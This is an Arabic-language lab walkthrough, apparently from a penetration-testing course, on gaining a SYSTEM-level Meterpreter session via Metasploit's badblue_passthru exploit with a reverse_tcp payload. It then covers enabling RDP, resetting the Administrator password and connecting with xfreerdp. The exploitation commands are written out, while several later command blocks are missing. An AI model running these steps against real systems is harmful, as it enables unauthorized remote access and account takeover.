🧪 المختبر العملي 23 : تمكين سطح المكتب البعيد (Windows – Enabling Remote Desktop Lab)

🎯 الهدف الأساسي: تمكين خدمة بروتوكول سطح المكتب البعيد (RDP) على نظام Windows المستهدف بعد الحصول على جلسة Meterpreter بصلاحيات عالية، مما يتيح الوصول الرسومي عن بعد إلى الجهاز.

🔧 الأدوات المستخدمة:

  • MSFconsole: واجهة Metasploit الرئيسية.

  • Exploit Module: أي وحدة استغلال تمنح جلسة Meterpreter بصلاحيات SYSTEM (مثلاً: windows/http/badblue_passthru أو rejetto_hfs_exec).

  • Meterpreter Payload: للحصول على تحكم كامل.

  • Post-Exploitation Module: post/windows/manage/enable_rdp.

  • Remote Desktop Client: مثل xfreerdp، للتحقق من الاتصال.

📜 خطوات التنفيذ:

📊 مرحلة الاستغلال (Exploitation)

  1. 🚀 بدء تشغيل MSFconsole والحصول على جلسة Meterpreter بصلاحيات SYSTEM:

    • ابدأ msfconsole:

      msfconsole -q
    • حدد عنوان IP للهدف.

    • 🔑 استخدام وحدة استغلال للحصول على Meterpreter (مثلاً Badblue HTTP Server):

      use exploit/windows/http/badblue_passthru
      set RHOSTS [Target_IP_Address]
      set LHOST [Your_Kali_IP_Address]
      set LPORT 4444
      set PAYLOAD windows/meterpreter/reverse_tcp
      exploit
    • إذا نفذت هذه الأوامر بنجاح، ستفتح جلسة Meterpreter session 1 opened.

    • 🔧 التحقق من الصلاحيات:

      getuid
    • يجب أن تظهر صلاحياتك SYSTEM.

  2. 🔧 إرسال جلسة Meterpreter إلى الخلفية:

    • لإرسال جلسة Meterpreter إلى الخلفية:

      background
    • للتحقق:

      sessions
    • ستظهر الجلسة رقم 1 نشطة.

📊 مرحلة ما بعد الاستغلال: تمكين RDP

  1. 💡 استخدام وحدة post/windows/manage/enable_rdp لتمكين RDP:

    • البحث عن الوحدة:

    • 🔑 استخدام الوحدة:

    • ⚙️ تعيين الخيارات:

    • 🚀 تشغيل الوحدة:

    • إذا نفذت هذا الأمر، ستقوم الوحدة بتمكين خدمة RDP على النظام المستهدف، وستظهر رسالة RDP is already enabled أو RDP is now enabled and started.

  2. 🔑 تغيير كلمة مرور مستخدم إداري لـ RDP (ضروري للوصول):

    • للوصول إلى RDP، تحتاج إلى اسم مستخدم وكلمة مرور صالحين. إذا لم تكن لديك، يمكنك تغيير كلمة مرور حساب Administrator.

    • تفاعل مع جلسة Meterpreter مرة أخرى:

    • ادخل إلى صدفة الأوامر:

    • تغيير كلمة مرور Administrator:

    • إذا نفذت هذا الأمر، ستتغير كلمة مرور حساب Administrator.

    • اخرج من صدفة الأوامر:

  3. ✅ التحقق من فتح منفذ RDP باستخدام Nmap:

    • افتح نافذة طرفية جديدة في كالي لينكس.

    • أعد فحص Nmap على الهدف:

    • إذا نفذت هذا الأمر، يجب أن يُظهر لك أن المنفذ 3389 (RDP) مفتوح الآن.

  4. ✅ الوصول إلى RDP باستخدام xfreerdp:

    • افتح نافذة طرفية جديدة في كالي لينكس.

    • حاول الاتصال باستخدام xfreerdp:

    • إذا نفذت هذا الأمر، ستُفتح نافذة سطح مكتب بعيد تعرض سطح مكتب النظام المستهدف.

    • يمكنك الآن التنقل في سطح المكتب المستهدف وقراءة ملف الفلاج (إن وجد).

نقاط التحقق:

  • يجب الحصول على جلسة Meterpreter بصلاحيات SYSTEM.

  • يجب تمكين خدمة RDP بنجاح على الهدف.

  • يجب أن تتمكن من تغيير كلمة مرور حساب Administrator.

  • يجب أن تكون قادرًا على الاتصال بالهدف عبر RDP ورؤية سطح المكتب.

Last updated